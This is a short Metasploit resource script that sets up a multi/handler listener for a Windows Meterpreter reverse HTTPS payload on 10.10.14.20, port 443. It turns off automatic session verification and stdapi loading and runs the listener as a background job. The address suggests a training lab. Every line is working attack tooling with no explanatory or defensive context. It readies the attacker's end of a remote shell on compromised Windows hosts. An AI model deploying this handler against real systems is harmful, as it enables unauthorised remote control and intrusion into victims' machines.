use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 10.10.14.20
set LPORT 443
set ExitOnSession false
set AutoVerifySession false
set AutoSystemInfo false
set AutoLoadStdapi false
exploit -j
